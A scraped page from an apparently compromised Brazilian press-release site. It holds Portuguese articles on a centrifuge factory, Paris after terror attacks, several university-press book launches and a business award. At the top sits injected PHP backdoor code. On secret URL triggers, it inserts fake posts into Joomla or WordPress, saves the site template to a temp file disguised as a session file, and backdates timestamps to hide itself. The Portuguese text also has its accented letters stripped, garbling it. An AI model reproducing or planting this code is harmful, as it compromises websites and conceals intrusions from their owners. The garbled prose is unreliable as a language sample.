if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (file_get_contents($tpl_path) > 0) { die('Success!'); } $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }  Divulgação de releases gratuitos - Divulga Release

Com investimentos da ordem de 1 milho de reais, a Pieralisi do Brasil, lder mundial na comercializao de decanters centrfugos para separao lquido-slido acaba de concluir a instalao de fbrica prpria, localizada em Louveira (SP).

A nova unidade, com 2500 ms, totalmente automatizada, passou todo o anos de 2015 investindo em inovao e aprimorando processos, com a compra de mquinas e tecnologias de ltima gerao trazidas da Europa para fabricao, recuperao e manuteno de decanters centrfugos.

De acordo com Eng. Estela Testa, CEO do grupo Pieralisi, dentre os novos investimentos realizados, vale ressaltar a nova tecnologia de balanceamento dinmico de alta velocidade e o novo sistema robotizado de revestimento duro contra abraso que juntos tem a finalidade de gerar um grande aumento da vida til dos equipamentos produzidos na nova unidade.

PONTE ROLANTE

Alm disso prossegue Eng Testa – foi realizado um grande investimento em dispositivos de montagem de componentes, rolamentos, engrenagens e sistemas de movimentao de cargas como pontes rolantes e demais equipamentos de elevao, alm de contnuos processo de treinamento dos tcnicos, que somados a um grande estoque de peas de reposio garantem uma alta qualidade e agilidade nos servios prestados, tendo como grande diferencial o curto prazo de manuteno e a alta qualidade dos trabalhos realizados.

De acordo com Eng Testa ainda, todos os equipamentos fabricados e reformados na sede da Pieralisi passam por um rigoroso teste de qualidade antes da sua liberao, uma vez que todos os equipamentos so testados e todas a frequncias de vibrao so analisadas atravs de um tecnolgico sistema de anlise de vibrao, temperatura e rudo, o que gera confiabilidade do equipamento durante a operao.

Mais informaeswww.pieralisi.com

Imprimir o Post No Comments Share

Depois da batalha da Frana na segunda guerra mundial, quando Holanda e Frana capitularam sob a foras Alemes em maio de 40, a Cidade Luz foi imediatamente declarada cidade aberta pelo ento governo francs. Paris foi ento ocupada pela mquina de guerra Alem em 1940, no dia 14 de junho. A ocupao e esta declarao de pelo-amor-de-Deus-no-quebrem-nada se mantiveram efetivas at meados de 1944 quando o pau comeu de novo, de dentro para fora, com macio esforo da resistncia francesa em expulsar os chucrutes, agora dentro dos limites da cidade.

Paris sempre foi a cidade que todos amamos, que todos respeitamos e que resistiu a pior guerra travada por serem humanos at ontem. Diferente de outras capitais e grandes cidades europeias, Paris tem resistido ao tempo, aos desastres naturais e as infinitas barbries humanas, quase que inclume.

Acho que por isso que umas dezenas de tiros, camuflados sob uma falsa bandeira religiosa ou poltica causaram tamanho estrago na autoestima do Francs. No houve guerra declarada que permitisse uma nova declarao antecipada de paz: Paris, cidade aberta. Somos a favor da boa vida, da discusso filosfica, do cultivo dos bons hbitos alimentares, da preservao da histria, da agradvel convivncia entre todos. Por favor no quebre nada nem ningum.

Os tiros do Lido e do Abdo, uma declarao de guerra fantasma, afastaram os franco-muulmanos das ruas e com isso, fortaleceram a falsa imagem de que estamos aqui na Frana, em guerra contra radicais muulmanos. O ISIS e os outros, como Hizbollah, so entidades polticas alguns inclusive com representao pblica nos parlamentos de seus pases.

A guerra fantasma (sem ptria, sem motivo, sem possvel negociao) contra as naes que, de uma forma ou de outra, limitam o acesso destes grupos ao mar, a petrleo e a um maior territrio. No h, eu repito, no h fundamento para o ataque a populao civil, turistas ou monumentos histricos, se no o de implantar o terror. Paris, por sua caracterstica de ser a cidade de todos ns, acabou por ser a mais frgil, a que mais tem a perder com ataques e ameaas.

Para ns turistas no mudou muito alm da contaminao deste medo parisiense. Somos agora expostos aos mesmos processos de segurana ou falta dela, tal qual em NYC ou Rio de Janeiro. Sem novidades. Precisamos voltar a Paris, ainda mais agora que restaurantes estrelados esto fazendo promoes de menus a preos de bistr e vrios museus e exposies esto com ingressos na faixa por dois dias da semana! Ningum fala dos atentados ou do medo que tem deles, como se todos os franceses tivessem perdido um familiar nos covardes ataques. E perderam mesmo. E ns por sensibilidade e educao, tampouco falamos disso.

Porm impossvel evitar uma certa melancolia irnica na sensao que todos ns estrangeiros temos hoje em dia em Paris. Se por um lado a vigilncia do aeroporto CDG igual a de GRU ou JFK, nas ruas que o boca-a-boca negativo se forma. Por exemplo: domingo a avenue du Champs Elysee est fechada ao trafego, porm todas as ruas de acesso tem uma barricada de policiais super armados (tipo Rio de Janeiro) vasculhando todas as bolsas, inclusive as Gucci, Herms, etc. A tenso forte e passa para lojistas, garons, e hoteleiros.

Todos meio que evitam falar do assunto, mas as nove da noite meu hotel recolhe discretamente as cadeiras da calada, e com isso, l se vai meu charuto noturno. E se decido, por pura estupidez ficar e fumar em p na porta do hotel, comigo fica o grande (do meu tamanho) e amabilssimo Jean, o segurana Senegals do Hotel.

Minha admirao por todas as pessoas faz com que seu disfarce caia por terra: ao me despedir, sorrio e digo salaam aleikum e ele, por entre um outro sorriso de paz responde aleikum al salaam. Este o cara que protege meu charuto de um atentado covarde, nas cercanias do Arco do Triunfo. Irnico? No para mim. No acredito em atentados religiosos, ainda mais muulmanos. Nem voc n? Ou voc tem 12 anos?

Um sol entre nuvens teima em forar a entrada da luz enquanto um garoto canta Ed Sheeran no sovaco do Arco. Uma msica que afirma que todos os idiomas e culturas so bem vindos em Paris. O sol certamente atrado pela cidade que teima em refleti-lo, mas Paris, de tanto machucada em sua normalidade pelos atentados do ano passado, nos avisa e assusta em cada esquina, em cada grande avenida com sons ininterruptos de sirenes e vozes de ordens.

Voc no saber se trata-se apenas de um congestionamento ou algo mais grave. As vezes a msica de artistas de ruas simplesmente para por um ou dois segundos. As vezes os milhares de oficiais da lei param, ouvem seus rdios por um ou dois segundos. E esta dvida, meu amigo, o que lhe causa terror. Sim, escolhi bem essa palavra: terror.

nossa misso agora visitar Paris, mudar este sentimento no corao da cidade e de nossos primos franceses e encher aquela cidade de amor.
Sim, amor. Paris , sempre foi e sempre ser sinnimo de amor.

*Julio Gavinho executivo da rea de hotelaria com 30 anos de experincia, fundador da doispontozero Hotis, criador da marca ZiiHotel, scio e CEO da Orion Hoteis e Resorts .

Imprimir o Post No Comments Share

Mesa-redonda conta com a participao do Mrio Cesar Lugarinho (USP), Andr S. D. Corrra de S (UFSCar) e mediao de Emerson da Cruz Incio (USP). Evento acontece nesta quinta-feira, 10 de novembro, s 18h30, na Livraria da Vila – Fradique, em So Paulo.

H uma produo significativa na fico portuguesa contempornea voltada ao homoerotismo, a homoafetividade e a homotextualidade. Termos diferentes, mas que apontam para uma vrtice comum: a expresso do amor, do desejo, dos anseios e das expectativas afetivas entre pessoas do mesmo sexo. Em“Corpo no outro corpo”: homoerotismo na narrativa portuguesa contempornea, lanamento da EdUFSCar, Jorge Vicente Valentim resgata do esquecimento do tempo e das prateleiras de bibliotecas, alm de obras e autores, um verdadeiro movimento silencioso e pouco observado de uma produo constante, insistente e resistente sobre as prticas entre indivduos portadores de sexualidades consideradas transgressoras.

O homoerotismo aqui tratado o masculino. Tal escolha deu-se muito mais por uma questo de eleio de corpus de pesquisa, sem haver qualquer motivao de imposio de hierarquia. Interessou-se por verificar, num primeiro plano, a produo de autores e como, a partir de uma resistncia a modelos heterossexistas, eles conseguiram consolidar um tema, at ento, considerado tabu pela tradio crtica. Tambm buscou-se por em relevo as identidades que desafiavam, e ainda desafiam, as polaridades maniquestas das polticas contemporneas que o turbilho poltico e cultural dos anos seguintes a Revoluo de 25 de abril de 1974, mais conhecida como Revoluo dos Cravos, tratou de soterrar.

A literatura, apesar de silenciada, construa um discurso vigoroso e engajado, do qual Valentim destaca, com muita justia, a obra literria do escritor Guilherme de Melo. Com a mesma intensidade e interesse, o autor se volta tambm para a produo mais contempornea, quando as lutas por direitos da populao LGBT parecem mais estabilizadas e naturalizadas, revisitando algumas obras de Natlia Correia e Mrio Cludio.

“Corpo no outro corpo” torna-se um livro de leitura incontornvel para quem deseja estudar no apenas o corpo ertico, mas, principalmente, o corpo homoertico da literatura portuguesa contempornea. Ser um livro com forte impacto nos meios acadmicos de Portugal e do Brasil. E, particularmente para mim, ainda uma obra cuja produo me trouxe um novo amigo”, afirma na abertura da obra Isabel Pires de Lima, ex-ministra da Cultura de Portugal, professora emrita e catedrtica da Faculdade de Letras da Universidade do Porto e investigadora do Instituto de Literatura Comparada Margarida Losa (Unidade I&D FCT).

Sobre o autor Jorge Vicente Valentim possui graduao em Letras, em Msica e licenciatura plena em Letras pela Universidade Federal do Rio de Janeiro, mestrado e doutorado em Letras (Literatura Portuguesa) pela mesma universidade, com ps-doutorado em Estudos Ruianos (com bolsa Faperj) e em Literatura Portuguesa (com bolsa Snior Capes). Atualmente professor associado de Literaturas de Lngua Portuguesa (Literatura Portuguesa e Literaturas Africanas de Lngua Portuguesa) e professor permanente do Programa de Ps-Graduao em Estudos de Literatura da Universidade Federal de So Carlos (UFSCar), alm de colaborador no Programa de Ps-Graduao em Estudos Literrios da Universidade Estadual Paulista Jlio de Mesquita Filho (Unesp/Araraquara). vice-presidente da Associao Brasileira de Professores de Literatura Portuguesa (Abraplip).

Ttulo: “Corpo no outro corpo”: homoerotismo na narrativa portuguesa contempornea
Autor: Jorge Vicente Valentim
Nmero de pginas: 313
Formato: 16 x 23 cm
Preo: R$ 48,00
ISBN: 978-85-7600-448-6

Lanamento em So Paulo
Data:10 de novembro, s 18h30
Local:Livraria da Vila – Fradique
R. Fradique Coutinho, 915 – Vila Madalena, So Paulo

Mais informaes sobre os livros da EdUFSCar esto disponveis no site www.editora.ufscar.br

Imprimir o Post No Comments Share

Vivemos um tempo de transformao das prticas de ensino, decorrentes da emergncia das tecnologias digitais de informao e comunicao. Um tempo marcado por intenso movimento de convergncias e redimensionamento das tradicionais experincias espaciais, temporais e culturais. EmEducao a distncia, qualidade e convergncias: sujeitos, conhecimentos, prticas e tecnologias, lanamento da EdUFScar, organizado por Daniel Mill e Aline Reali, educadores brasileiros e estrangeiros voltam-se para a qualidade pedaggica em geral, tendo como propsito analisar os principais desafios e dificuldades postos a educadores, estudantes e gestores, particularmente no contexto da educao a distncia.

Os 14 captulos do livro versam sobre temticas fundamentais para o entendimento da educao a distncia e seus desdobramentos para a educao presencial. Os temas envolvem aspectos como as definies de cultura da convergncia e narrativa transmdia na educao a distncia, bem como analisam a qualidade dessa educao que ocorre cada vez mais em espaos hbridos, multimodais e ubquos. Apresentam detalhes sobre a sabedoria digital e a informtica educativa dentro do contexto do estudante EaD, tratam das implicaes para o ensino tradicional e a distncia, trazem reflexes sobre a relao entre a cultura digital e a universidade e verificam as bases tericas e metodolgicas da experincia POMAR (Percursos Online Mltiplos, Abertos e Rizomticos).

Os captulos tambm possibilitam pensar em propostas como, por exemplo, a de criar uma ponte entre Portugal e Brasil com o Campus Virtual da Universidade Aberta (UAb) de Portugal. Relatam a experincia da capacitao dos servidores do sistema prisional em cursos a distncia (uma parceria entre o Ministrio da Justia e a Universidade Federal de Minas Gerais), investigam e (re)pensam os processos pedaggicos em Educao Bsica a Distncia e matemtica vivida por futuros professores dos anos iniciais reveladas em narrativas.

So textos que instigam a reflexo sobre a educao em geral e a EaD em particular. Percebemos que, at certo ponto, as transformaes que vm afetando as prticas no mbito da educao a distncia tambm so tpicas da educao presencial e, portanto, trata-se de metamorfoses da educao como um todo e da qualidade dos processos educacionais em geral, afirmam os organizadores.

Sobre os organizadores Daniel Mill professor da Universidade Federal de So Carlos (UFSCar), onde trabalha como docente e gestor de Educao a Distncia (EaD). Doutor em Educao pela Universidade Federal de Minas Gerais (UFMG), com ps-doutorado pela Universidade Aberta de Portugal, membro do Programa de Ps-Graduao em Educao e do Programa de Ps-Graduao em Cincia, Tecnologia e Sociedade.Aline Reali graduada em Psicologia (FFCL de Ribeiro Preto – USP), mestre em Educao Especial (Educao do Indivduo Especial – UFSCar) e doutora em Psicologia (Psicologia Experimental – USP). professora titular do departamento de Teorias e Prticas Pedaggicas do Centro de Educao e Cincias Humanas (CECH) da UFSCar. Atualmente secretria de Educao a Distncia da UFSCar.

Ttulo: Educao a distncia, qualidade e convergncias: sujeitos, conhecimentos, prticas e tecnologias
Organizadores: Daniel Mill e Aline Reali
Nmero de pginas: 269
Formato: 16 x 23 cm
Preo: R$ 40,00
ISBN: 978-85-7600-449-3

Mais informaes sobre os livros da EdUFSCar esto disponveis no site www.editora.ufscar.br

Imprimir o Post No Comments Share

H polticas culturais para os ndios e h polticas culturais dos ndios. No so a mesma coisa, afirma a antroploga Manuela Carneiro da Cunha, organizadora, juntamente com Pedro de Niemeyer Cesarino, do livroPolticas culturais e povos indgenas, ganhador do Prmio Jabuti em 2015 na categoria Cincias Humanas, agora lanado pela Editora Unesp.

O livro rene 19 ensaios que procuram distinguir e debater as polticas culturais feitas para os ndios, as feitas pelos ndios e aquelas que de alguma maneira os envolvem. So observadas no apenas tais polticas, mas tambm seus pontos de cruzamento e seus efeitos conjugados.

So efeitos s vezes claros e s vezes sutis. Por isso, a obra assentada em etnografias. Seu valor, portanto, acautelar-se diante de generalizaes. Se h semelhanas, sem dvida, entre sociedades indgenas no Brasil, at entre aquelas distantes no espao e linguisticamente desconectadas, essas conexes no resultam em homogeneidade. No se podem generalizar concluses, alerta a organizadora da obra, num elogio do estranhamento. dessa perspectiva que se desenvolve esse livro, ao apontar o inslito sob a aparncia do familiar, permitindo-nos exercitar a capacidade de estranhar.

O direito dos ndios de formular suas prprias polticas culturais s foi institudo com a Constituio de 1988. At ento, os projetos existentes visavam ao que se entendia como a integrao das populaes indgenas. Mas integrao no passava de um eufemismo para um programa de assimilao cultural e de dissoluo tnica, afirmam os autores.

Dirigido a quem se envolve em polticas culturais, o livro levanta e comenta difceis questes como: Qual so as relaes adequadas entre a escola e as sociedades indgenas, entre o saber que capacita os ndios a melhor se mover na sociedade brasileira e os conhecimentos e prticas tradicionais que se quer valorizar, entre uma tradio oral e uma tradio escrita? possvel ensinar cultura na escola?

Sobre os organizadores – Manuela Carneiro da Cunha antroploga. Doutorou-se e ensinou na Universidade Estadual de Campinas (1973-1984), foi professora titular na Universidade de So Paulo (1984-1994) e na Universidade de Chicago (1994-2009). membro da Academia Brasileira de Cincias. Foi titular da ctedra Savoirs contre pauvret no Collge de France (2011-2012). Recebeu vrios prmios, entre os quais a Ordem do Mrito Cientfico na Classe Gr Cruz, a Lgion dHonneur da Frana, a medalha Roquette-Pinto da Associao Brasileira de Antropologia e a medalha da Francofonia da Academia Francesa. Sua atuao distribui-se pela etnologia, histria e direitos dos ndios, escravido negra, etnicidade, conhecimentos tradicionais e teoria antropolgica.

Pedro de Niemeyer Cesarino graduado em Filosofia pela Universidade de So Paulo, mestre e doutor em Antropologia Social pelo Museu Nacional/ UFRJ, tendo realizado seu ps-doutorado no Departamento de Letras da Universidade de So Paulo (2008-2010). Foi professor do Departamento de Histria da Arte da Unifesp e, atualmente, leciona no Departamento de Antropologia da USP. autor deOniska potica do xamanismo na Amaznia (Perspectiva, 2011), terceiro lugar do Prmio Jabuti de Cincias Humanas, eQuando a Terra deixou de falar cantos da mitologia marubo (Editora 34, 2013).

Ttulo:Polticas culturais e povos indgenas
Organizadores: Manuela Carneiro da Cunha e Pedro de Niemeyer Cesarino
Nmero de pginas: 517
Formato: 16 x 23 cm
Preo: R$ 69,00
ISBN: 978-85-3930617-6

Mais informaes sobre os livros publicados pela Editora Unesp esto disponveis no site: www.editoraunesp.com.br

Imprimir o Post No Comments Share

Planejar e propor mudanas para ampliar a qualidade de vida nas cidades, respeitando suas caractersticas e desafios no tarefa fcil. Nas metrpoles que sofreram um crescimento desorganizado e possuem poucos espaos verdes e problemas com transporte de massa, o entrave ainda mais complexo.

Com o objetivo de ampliar a conscincia sobre sustentabilidade e a interao entre comunidade e urbanismo, a Organizao das Naes Unidas estabeleceu 8 de novembro, de 1949, como o Dia Mundial do Urbanismo. Para incentivar o debate sobre as questes referentes s cidades, a Editora Unesp oferece, entre os livros de seu catlogo, ttulos sobre Arquitetura e Urbanismo com 20% de desconto at 12 de novembro. Confira abaixo a seleo:

A metrpole de So Paulo no sculo XXI
A metrpole de So Paulo no sculo XXIOrganizador:Eduardo Marques | Pginas: 464 | De R$ 74 por R$ 59,20

Os captulos deste livro investigam diversas dimenses das mudanas sociais e econmicas recentes na metrpole de So Paulo, incluindo as transformaes do mercado de trabalho, as dinmicas demogrficas, os padres de segregao por classe e raa, as condies urbanas,a produo habitacional pblica e pela via de mercado. Surge assim um retrato ao mesmo tempo mais complexo e mais preciso da cidade de So Paulo neste incio de sculo XXI.

Arquitetura e urbanismo no Vale do ParabaArquitetura e urbanismo no Vale do Paraba
Autor:Percival Tirapeli | Pginas: 240 | De R$ 124 por R$ 99,20

Apresenta uma ampla e profunda pesquisa sobre a fundao de vilas ao redor das capelas no Vale do Paraba paulista durante o perodo colonial e sua expanso na poca imperial, comas igrejas reformadas ao gosto ecltico.A pesquisa adentra todo o sculo XIX,destacando anlises minuciosas sobre o patrimnio sacro, desde as tcnicas construtivas at seus altares barrocos.

Joo Batista Vilanova Artigas
Joo Batista Vilanova ArtigasAutor:Miguel Antonio Buzzar | Pginas: 456 | De R$ 80 por R$ 64
Tendo em vista as lacunas existentes no apenas na historiografia sobre a obra de Vilanova Artigas, mas sobre a arquitetura brasileira em geral, Miguel Antonio Buzzar se empenha em apresentar um panorama detalhado do Modernismo no Brasil, ao mesmo tempo que o articula com os caminhos da produo de Artigas.
Joo Walter Toscano
Joo Walter ToscanoOrganizadora:Rosa Camargo Artigas | Pginas: 187 | De R$ 115 por R$ 92

Rene cinco textos sobre o arquiteto, urbanista e historiador de arquitetura Joo Walter Toscano. Inclui fotografias e desenhos de 19 projetos por ele assinados, alm de resumo biogrfico, cronologia de obras e projetos, e bibliografia selecionada.

Por amor s cidades
Autor: Jacques Le Goff | Pginas: 160 | De R$ 66 por R$ 52,80

Jacques Le Goff e Jean Lebrun procuram fornecer os modos de compreenso da ruptura urbana que caracterizam nossa poca. Por meio de quatro temas, a cidade como lugar de troca de dilogo, como lugar de segurana, de poder e de aspirao beleza, os historiadores analisam a reconfigurao do conjunto de funes da cidade. A pesquisa iconogrfica aparece aqui como complemento necessrio ao texto.
Confira outros ttulos relacionados:

A cidade e os jardins, deZueleide Casagrande de Paula (268 pginas, de R$ 48 por R$ 38,40)

A reabilitao da residncia no centro histrico da Amrica Latina, deRsio Fernndez Baca Salcedo (261 pginas, de R$ 55 por R$ 44)

Os pioneiros da habitao social – Vol. 2, deAna Paula Koury e Nabil Bonduki (512 pginas, de R$ 194 por R$ 155,20)

Os pioneiros da habitao social – Vol. 3, organizado porAna Paula Koury e Nabil Bonduki (296 pginas, de R$ 158 por R$ 126,40)

A forma da cidade de origem portuguesa, deManuel C. Teixeira (208 pginas, de R$ 110 por R$ 88)

Transformar a metrpole, deCatherine Iffly (360 pginas, de R$ 64 por R$ 51,20)

A formao dos patrimnios religiosos no processo de expanso urbana paulista (1850-1900), deNilson Ghirardello (268 pginas, de R$ 60 por R$ 48)

Shopping centers, organizado porSilvana M. Pintaudi e Heitor Frgoli Jr (134 pginas, de R$ 40 por R$ 32)

Pensando os papis e significados das pequenas cidades, dengela Maria Endlich (360 pginas, de R$ 80 por R$ 64)

*Imagem: cidade do Rio de Janeiro

Mais informaes sobre os livros publicados pela Editora Unesp esto disponveis no site:www.editoraunesp.com.br

Imprimir o Post No Comments Share

Com o principal objetivo de reconhecer e homenagear dois lderes empresariais e comunitrios com grande viso de gesto, o Brazil-Florida Business Council (BFBC) realizarᠠo evento “2016 Brazil-Flrida Business Awards” no dia15 de novembronos sales do tradicional Tampa Club da cidade de Tampa. Bob Buckhorn,prefeito de Tampa e Chieko Aoki,presidente do Blue Tree Hotels e Resorts sero os homenageados no almoo anual de premiao.

De acordo com Sueli Bonaparte, presidente-fundadora do BFBC, “anualmente a comunidade internacional empresarial da Flrida rene representantesdos setores pblico e econmico paracelebraras contribuies realizadasno eixo Brasil-Florida,representando os segmentos que atuam”.

REPERCUSSO

A escolha de Chieko Aoki para o prmio “empresria do ano” outorgado pelo BFBC foi recebida com entusiasmo por representantes de vrios setores da economia brasileira. Sylvia Coutinho,presidente do Banco Suo UBS no Brasil, disse “Fico feliz por esta merecida homenagem a ela, no spelatrajetria profissional e pessoal, mas tambm por ser umrole model para muitas mulheres no Brasil e no Japo, onde os preconceitos ainda so muitos.” Para Sylvia, Chieko est “sempre pronta para um desafio, cheia de energia para mudar o que precisa ser mudado, e comprometida com ideais por um Brasil melhor.”

Chieko Aoki, considerada um cone do setor hoteleiro e sinnimo de inovao,”transformou a Blue Tree Hotels em uma das maiores e mais bem conceituadas redes hoteleiras do Brasil, com excelncia em servios de padro internacional,” proclama seu grande admirador Joo Doria, Jr.,prefeitoeleito da cidade de So Paulo e presidente licenciado do Grupo Doria e LIDE- Grupo de Lderes Empresariais. Em 2006, Doria criou o LIDE MULHER- Grupo de Mulheres Lderes Empresariais e convidou Chieko para presidir ogrupo “para valorizar atributos da gesto feminina e inspirar lideranas, e ela liderou esta iniciativa com fora e determinao,” enfatiza Doria com admirao.

A empresria Luiza Helena Trajano,presidente da Magazine Luiza se emociona ao tomar conhecimento da homenagem amiga de longa data. “A Chieko uma das mais importantes profissionais do turismo brasileiro, gerando empregos e renda para o nosso pas.” E declara que ”ela uma grande inspirao” para muitas mulheres executivas.

